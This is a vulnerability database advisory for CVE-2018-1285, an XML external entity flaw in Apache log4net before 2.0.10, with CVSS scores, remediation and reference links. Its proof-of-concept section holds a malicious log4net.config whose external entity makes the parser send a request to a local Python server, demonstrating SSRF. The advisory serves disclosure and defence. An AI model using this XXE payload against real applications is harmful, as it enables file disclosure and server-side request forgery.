Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2018-1285

Date: May 11, 2020

Overview

Apache log4net is an open-source utility that allows developers to output log statements to a wide range of logging targets flexibly and fast. The tool is configured using an XML configuration file, which is easily readable and updateable. Its affected versions allow an attacker to transmit tainted XML data via configuration files and harm the application.

Details

The CVE-2018-1285 vulnerability exists because of how log4net parses XML configuration files in applications where it is permitted to undertake XML external entity processing. If XML external entities when parsing configuration files are not disabled, an intruder could leverage this vector to stage an attack.
An attacker could make malicious changes to an XML configuration file, which is defined using the Document Type Definition (DTD) structural style, making the XML parser to embed incorrect content into its output. As a result, the attacker could force the processing application to expose sensitive data contained in local files, initiate a denial of service, or cause other system impacts.
This type of attack is called XXE attacks, which is the shortened version for the term "XML eXternal Entities" attacks.

PoC Details

Environment:
.NET Framework 4
Log4net 2.0.8
Python 3.9.1.

Below is a simple .NET framework application which uses Log4net to log an informative message.
The application reads from log4net.config file, which contains a malicious XXE which sends an http request to an arbitrary address (for demonstration purposes it will be "localhost" at port 8000).
Set up a simple python server serving port 8000 at "localhost".
Now build and run the application, and you will see a new request received at the python server side, proving SSRF through XXE.

PoC Code

// Program.cs - the application
using System.IO;
using System.Reflection;
using log4net;
using log4net.Config;

namespace CVE_2018_1285
{
    class Program
    {
        private static readonly ILog log = LogManager.GetLogger(typeof(Program));
        static void Main(string[] args)
        {
            var logRepository = LogManager.GetRepository(Assembly.GetEntryAssembly());
            XmlConfigurator.Configure(logRepository, new FileInfo("log4net.config"));
            log.Info("Info");

        }
    }
}

// log4net.config content:
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "http://localhost:8000/">
]>
<foo>&xxe;</foo>

// for simple python server, on cmd:
> python -m http.server

// When running the built application, the following request is logged at the server side:
::1 - - [24/Aug/2021 10:18:48] "GET / HTTP/1.1" 200

Affected Environments

Apache log4net versions before 2.0.10

Remediation

Do not permit arbitrary configurations files to be specified from untrusted users Disable DTDs completely

Prevention

Update to log4net version 2.0.10 or higher

Language: C#

Good to know:

icon
icon

Improper Restriction of XML External Entity Reference ('XXE')

CWE-611
icon

Upgrade Version

Upgrade to version log4net - 2.0.10

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Low
Authentication (AU): None
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial
Additional information:

Related Resources (20)

https://lists.apache.org/thread.html/rdbac24c945ca5c69cd5348b5ac023bc625768f653335de146e09ae2d%40%3Cdev.logging.apache.org%3E
https://www.oracle.com/security-alerts/cpuApr2021.html
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VT2DNNSW7C7FNK3MA3SLEUHGW5USYZKE/
https://issues.apache.org/jira/browse/LOG4NET-575
https://lists.apache.org/thread.html/r525cbbd7db0aef4a114cf60de8439aa285decc34904d42a7f14f39c3%40%3Cdev.logging.apache.org%3E
https://www.oracle.com/security-alerts/cpujan2021.html
https://lists.apache.org/thread.html/r7ab6b6e702f11a6f77b0db2af2d5e5532f56ae4b99b5fe73c5200b6a%40%3Cdev.logging.apache.org%3E
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M2U233HVAQDSZ2PRG4XSGDASLY3J6ALH/
https://lists.apache.org/thread.html/reab1c277c95310bad1038255e0757857b2fbe291411b4fa84552028a%40%3Cdev.logging.apache.org%3E
https://security.netapp.com/advisory/ntap-20220909-0001/
https://lists.apache.org/thread.html/rd2d72a017e238d1f345f9d14e075c81be16fc68a41c9e9ad9e29a732%40%3Cdev.logging.apache.org%3E
https://www.oracle.com/security-alerts/cpuapr2022.html
https://lists.apache.org/thread.html/r33564de316d4e4ba0fea1d4d079e62cde1ffe64369c1157243d840d9%40%3Cdev.logging.apache.org%3E
https://lists.apache.org/thread.html/r6543acafca3e2d24ff4b0c364a91540cb9378977ffa8d37a03ab4b0f%40%3Cdev.logging.apache.org%3E
https://people.canonical.com/~ubuntu-security/cve/CVE-2018-1285
https://nvd.nist.gov/vuln/detail/CVE-2018-1285
https://lists.apache.org/thread.html/r00b16ac5e0bbf7009a0d167ed58f3f94d0033b0f4b3e3d5025cc4872%40%3Cdev.logging.apache.org%3E
https://lists.apache.org/thread.html/r9de86a185575e6c5f92e2a70a1d2e2e9514dc4341251577aac8e3866%40%3Cdev.logging.apache.org%3E
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VKL2LPINAI6BCMXOH4V4HVHGLUXIWOFO/
https://www.mend.io/vulnerability-database/CVE-2018-1285